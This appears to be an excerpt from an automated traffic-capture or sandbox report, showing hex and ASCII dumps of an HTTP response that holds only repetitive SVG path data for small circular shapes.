                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5945INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5961INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5977INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC5993INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6009INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6025INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                                        Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6041INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6057INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6073INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6089INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6105INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6121INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6137INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6153INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6169INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6185INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:08 UTC6201INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
